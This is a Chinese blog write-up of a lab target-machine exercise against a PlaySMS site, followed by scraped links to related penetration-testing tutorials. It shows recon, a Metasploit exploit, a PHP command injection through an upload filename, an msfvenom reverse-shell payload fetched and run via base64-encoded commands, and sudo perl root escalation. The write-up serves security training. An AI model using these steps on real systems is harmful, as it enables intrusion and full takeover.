web靶机系列-命令注入

最新推荐文章于 2025-05-24 21:20:11 发布
最新推荐文章于 2025-05-24 21:20:11 发布
阅读量1k 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 安全 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rlenew/article/details/106397792

主机:192.168.136.133
靶机:192.168.136.139
用nmap、nikto扫描操作
在这里插入图片描述
发现在robots.txt下存在五个文件
在这里插入图片描述
在nothing的页面源代码下发现有五个密码
在这里插入图片描述
在这里插入图片描述
在刚刚的nikto的扫描中存在一个/secure/文件,打开发现一个压缩包
在这里插入图片描述
压缩包需要密码,经测试密码是freedom,但解压后的文件是txt文件。需要更改文件后缀,得到
在这里插入图片描述
登陆给出的网址,输入账户。密码再测试一下,发现是diana
在这里插入图片描述
在这里插入图片描述
用searchsploit查找页面架构下了漏洞
在这里插入图片描述
第一个可利用漏洞是’/sendfromfile.php’ Remote Code Execution / Unrestricted File Upload
在这里插入图片描述
利用上传文件名漏洞执行命令。
第二个漏洞是’import.php’ Remote Code Execution
在这里插入图片描述
利用有效载荷存储在backdoor.csv中,它执行我们的有效负载,并相应地显示在下一页的字段中。可以一句话注入提权。
根据网页我们利用’/sendfromfile.php’ Remote Code Execution / Unrestricted File Upload

1、利用msfconsole中use exploit/multi/http/playsms_filename_exec
在这里插入图片描述
配置好各参数
在这里插入图片描述
成功拿到靶机的shell
在这里插入图片描述
查看当前目录和当前账号是否具有root权限
在这里插入图片描述
开始提权
使用shell命令直接切换到靶机的shell,使用sudo -l查看当前用户可以使用sudo命令,发现存在一个perl命令,perl是一个调用脚本的命令,使用sudo perl -e "exec ‘/bin/bash’"直接使用root权限调用shell
在这里插入图片描述
使用python -c "import pty;pty.spawn(’/bin/bash’)"进行优化命令行界面。在/root下找到flag
在这里插入图片描述

2、在cat下查看漏洞目录,即cat /usr/share/exploitdb/exploits/php/webapps/42003.txt
在参考的文档中发现,通过修改上传文件的filename来获取系统信息,这里可以使用burpsuite截断修改
在这里插入图片描述
在上传页面上发现,这个页面只能上传.csv文件,在当前目录下touch 1.csv创建一个.csv用来上传,上传时记得开启burp的截断
在这里插入图片描述
将截获到的信息发送到repeater模块,找到filename修改成文档中看到的<?php system('uname -a'); dia();?>.php,确实发现返回了靶机的内核信息,漏洞可以利用。每执行过一次就需要重新截断请求重新提交。接下去就是获取到靶机的shell
在这里插入图片描述
首先使用msfvenom生成脚本msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.136.133 lport=4444 -f elf > /var/www/html/s,
然后启动Apache service apache2 start
在这里插入图片描述
接下去就是需要利用漏洞下载脚本并执行,攻击机上提前开启msf的handler模块进行监听。由于靶机上开启了防火墙,这时候就需要使用base64编码进行绕过。先在攻击机上需要执行的三条命令做base64编码。
在这里插入图片描述
启动msfconsole监听
在这里插入图片描述
在这里插入图片描述
接下来将在burpsuite上对 filename="<?php system(base64_decode('XXXXXXXX')); dia();?>.php".xxx的内容使用编码过的命令代替(重复三次)。当第三条命令执行完会没有任何反应,这时候就可以去msf上查看已经获取到shell

0x 0101
关注
Sqli-labs 靶机注入训练(1-5)
qq_41819426的博客
12-03 4357
Sqli-labs靶机注入训练1、sqli-labs 环境搭建什么是sqli-labs?环境搭建1.下载sqli-labs2.phpstudy(PHP+mysql环境搭建)①首先先下载一个PHPstudy②把你的sql-labs.zip解压到这个PHPstudy的根目录底下3、修改 db-creds.inc 里代码④访问http://sqli/(访问域名,你放在哪个文件夹就叫什么) 来进入sqli-labs的首页常见问题:2.less -13.less -24.less -35.less -46.less
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 1043
SQL注入getshell靶机实战
6.26.1 命令注入
ailkli的博客
06-26 241
php system(base64_encode('放置base64代码'));将1.csv改成<?进行下面的操作 其实上面的放3次包监听过程可忽略,进行如下操作即可。发现打不开mp3打开属性 发现不是真mp3文件,用记事本打开。在浏览器进行抓3次放3次绕过防火墙的bash64的包。在本地创建1.csv文件(空文件只要是.csv后缀)以上操作说明filename存在代码执行和代码注入。本地返回playsms页面上传文件抓包。在sms网页上传1.csv文件。
rce命令执行原理及场实战(详细)
最新发布
十步不敢沙人的博客
05-24 781
本文分析了web管理界面中存在的命令执行漏洞原理,详细介绍了四种管道符(|、||、&、&&)的命令执行方式,并通过DVWA场实验演示了漏洞利用过程。重点讲解了如何通过命令执行漏洞创建系统账户、提升权限、开启远程连接服务,以及写入webshell木马实现持续控制的方法,包括使用netuser创建账户、netlocalgroup提权等具体操作指令。文章提供了完整的漏洞利用链技术细节,从初级命令执行到高级权限维持的全过程
web 攻击靶机
dinghongzui6895的博客
04-22 613
一、sql注入靶机攻击 首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24 发现可疑ip地址192.168.2.129 并使用nmap扫描这个ip地址,发现其开放了ftp和http协议 打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点 在id=1后加一个引号,网页报错 该网站存在sq...
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
DVWA—Command Injection(命令注入
Cwillchris的博客
10-28 2084
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、源码分析 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input //获取IP字段 $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping comman.
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3547
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
ctfshow-web入门系列-命令执行-web29-web36
m0_74416116的博客
09-27 2129
ctfshow 命令执行入门学习
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4469
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
web靶机系列-命令执行
rlenew的博客
05-28 695
主机地址:192.168.136.133 目标地址:192.168.136.135 先用nmap搜查: 然后用nitko工具查找网站的信息,看到有敏感文件泄露: 登陆网站并访问/test.jsp,看到界面有提醒用“ls -l /tmp”查看文件 当输入命令后,得到响应则可以认定为命令执行漏洞 查看home目录,挖掘用户信息 ls -alh /home/ 查看具体用户的目录: ls -alh /home/用户名/,发现用户有ssh服务 查看系统消息:uname -a 查看bill用户 sudo命令
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6898
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
web靶机渗透思路--web渗透笔记-思路,综合渗透笔记思路(入门)(待补全)
网络专业 学习网安 参加几次信安 拿过二等奖 渗透略会,跨行学下拼多多运营
04-11 2461
1. 信息收集:收集目标网站的相关信息,包括域名、IP地址、服务器类型、网站架构等。 2. 漏洞扫描:使用漏洞扫描工具对目标网站进行扫描,发现可能存在的漏洞,如SQL注入、XSS、文件上传等。 3. 弱口令测试:对目标网站的登录界面、管理员后台等进行弱口令测试,尝试使用常见的弱口令进行登录。 4. 目录遍历:通过目录遍历攻击手法,尝试访问目标网站的敏感文件和目录,如配置文件、日志文件等。 5. 文件上传测试:对目标网站的文件上传功能进行测试,尝试上传恶意文件,并执行任意代码。 6. XSS攻击:通
SQL注入学习-RDCTF靶机实战1
qq_46231152的博客
09-10 389
sqlmap的安装 1.获取sqlmap压缩包 2.解压后将其添加进入环境变量 3.打开命令行窗口输入sqlmap.py运行 sqlmap的使用 本次使用的命令 sqlmap.py -u {URL} //查看是否有注入点 sqlmap.py -u {URL} -dbs //爆数据库 sqlmap.py -u {URL} -D db --tables //爆数据表 sqlmap.py -u {URL} -D db -T table --columns //爆字段 sqlmap.py -u {URL} -D
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1469
vulnhub ai-web1.0
安装部署WEB安全测试用的靶机(DVWA,MCIR,pikachu,mutillidae,bwapp)
reqian23
03-06 858
1.准备 Windows 2008 r2 或者 CentOS 虚拟机(本案例以 Windows 2008 r2 为范本) 5个靶机及xampp在这里 链接:https://pan.baidu.com/s/1MWzZuVt8kfTIPeEVcrDniA 提取码:7lpt 在Windows 2008 r2上安装xampp 一直下一步就可以 安装完之后会自动打开,先关掉(还有托盘里的) 删掉目录下的临时文件: 找到xampp-control,右击属性-兼容性-以管理员身份运行 发
web场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 6434
web-xss-labs靶机平台的搭建和代码审计
Webdeveloper靶机详解
2401_86817779的博客
01-24 777
我们不知道该账户密码,所以不能用sudo -l,我们可以看一下有没有mysql进程,或者find找一下有root权限的文件,但并无有效信息。然后再把这个模板激活,那如何触发404.php呢,需要我们访问一个不存在的页面,,kali开启监听,成功反弹shell。得到用户名是webdeveloper,因为密码字典太大了,不容易爆破,看看其他的有没有有效信息。我们还可以进入网站根目录,看看是否可以找到配置文件,这里面可能存有账户密码。有回显,那说明命令没问题,并且返回root,尝试获取shell
vulnhub靶机AI-WEB1
01-19
### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来获得系统的进一步访问权限。 #### 初始侦察阶段 在开始任何实际攻击之前,进行全面的情报搜集至关重要。这通常涉及到使用诸如`Nmap`这样的工具来进行端口扫描和服务版本检测: ```bash nmap -A <target_IP> ``` 上述命令能够揭示开放的服务及其潜在的安全配置缺陷[^3]。 #### Web服务器枚举 一旦确认目标运行着HTTP(S)服务,则应立即启动目录遍历尝试。可借助像`Dirb`或更现代的选择如`Gobuster`等工具完成这项工作: ```bash gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` 此过程有助于发现隐藏页面和管理接口,它们可能是后续入侵的关键入口点。 #### 应用层挖掘 对于基于PHP构建的应用程序来说,源码泄露是一个常见问题。如果运气好,在上一步找到的路径里可能会存在`.php~`或其他临时文件形式暴露出来的代码片段。仔细审查这部分内容往往能带来意想不到的收获——比如硬编码凭证或是调试模式下的敏感信息泄漏。 #### 数据库交互测试 许多老旧CMS(内容管理系统)容易受到SQL注入的影响。当遇到带有查询参数的URL时,不妨试试经典的单引号闭合技巧;而对于表单提交,则可通过修改POST数据包中的字段名与值组合来进行试探性输入验证绕过[^8]。 #### 提升权限方法 成功突破前端防护之后,下一步便是考虑怎样扩大战果直至取得root shell。Linux系统下,检查SUID位设置不当的二进制文件是一项基本技能;而Windows环境中则需留意计划任务、注册表键值异常变动等情况。 #### Drupal特定注意事项 鉴于部分描述提及到Drupal CMS, 若确实如此的话,值得注意的是有关于此框架内核升级机制的一个已知特性:即管理员账户密码可以通过编辑数据库记录的方式实现重置而不依赖原有认证流程[^9]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值